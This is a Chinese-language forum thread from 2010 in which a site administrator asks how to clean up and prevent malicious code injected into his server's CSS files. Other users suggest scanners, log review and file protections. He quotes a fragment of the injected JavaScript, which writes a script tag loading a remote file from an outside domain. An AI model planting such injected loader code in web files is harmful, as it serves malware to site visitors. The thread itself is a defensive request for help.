免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 4315 | 回复: 8
打印 上一主题 下一主题

服务器的网站被挂马了,请求帮助 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2010-08-10 14:32 |只看该作者 |倒序浏览
本帖最后由 gavinkong 于 2010-08-10 14:53 编辑

前几天服务器上的网站被挂马了,查看了被挂马的文件,都是些css文件,而且都是设置为777权限了。
我删除代码之后,把权限设置为644,css正常了,不会被挂马了。

但是因为一些目录必须是777的,而且里面是css,js,框架自动生成的。所以没办法更改权限。
所以就乱到这些文件被挂马了。

都是这样的代码
  1. document.body.appendChild(i);i.co
  2. ntentWindow.setTimeout(function(){i.contentWindow.document.write('<script src=http://www.successtest.co.kr/files/yahoo.js></script>');}
  3. ,1000);},1000);ele.style.zoom='1';}(this));
复制代码
请教高手,怎么查漏洞,清除完恶意代码后,怎么才能不让它又插入到文件?在此先谢谢了。

论坛徽章:
0
2 [报告]
发表于 2010-08-10 15:48 |只看该作者
没有什么太好的办法,xscan 能不能扫出什么漏洞吗
另外,更多的可能是网站设计上的漏洞,这个要具体问题具体分析了,比如注入

论坛徽章:
381
CU十二周年纪念徽章
日期:2014-01-04 22:46:58CU大牛徽章
日期:2013-03-13 15:32:35CU大牛徽章
日期:2013-03-13 15:38:15CU大牛徽章
日期:2013-03-13 15:38:52CU大牛徽章
日期:2013-03-14 14:08:55CU大牛徽章
日期:2013-04-17 11:17:19CU大牛徽章
日期:2013-04-17 11:17:32CU大牛徽章
日期:2013-04-17 11:17:37CU大牛徽章
日期:2013-04-17 11:17:42CU大牛徽章
日期:2013-04-17 11:17:47CU大牛徽章
日期:2013-04-17 11:17:52CU大牛徽章
日期:2013-04-17 11:17:56
3 [报告]
发表于 2010-08-10 20:59 |只看该作者
检查下web日志,看看是如何挂的马,然后再想办法

论坛徽章:
0
4 [报告]
发表于 2010-08-20 09:18 |只看该作者
感谢楼上两位的提醒。
昨天安装了clamav扫描了整个系统,清除了一些恶意文件。今天早上终于看到没有被插入代码了。

论坛徽章:
0
5 [报告]
发表于 2010-08-20 10:41 |只看该作者
还可以装一个 rkhunter,在线更新一下木马库,扫描一下系统内部可能被植入的木马

论坛徽章:
0
6 [报告]
发表于 2010-09-29 21:08 |只看该作者
升级内核,为文件设置扩展属性!

论坛徽章:
0
7 [报告]
发表于 2010-10-21 10:35 |只看该作者
用Rsync+inotify吧!

论坛徽章:
0
8 [报告]
发表于 2012-04-01 16:44 |只看该作者
被挂马是个头疼的问题啊!

论坛徽章:
0
9 [报告]
发表于 2012-04-02 09:20 |只看该作者
回复 2# platinum
你们的服务器是租用的还是独立的,如果是租用的,这个问题就不怎么好解决了;因为,就算你的网站安全级别很高;但是,如果在同一台服务器的其他网站安全级别不够的话,也是无用的;这个方法就是“旁注法”。
你的服务器是什么系统,数据库是什么架构???

   
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP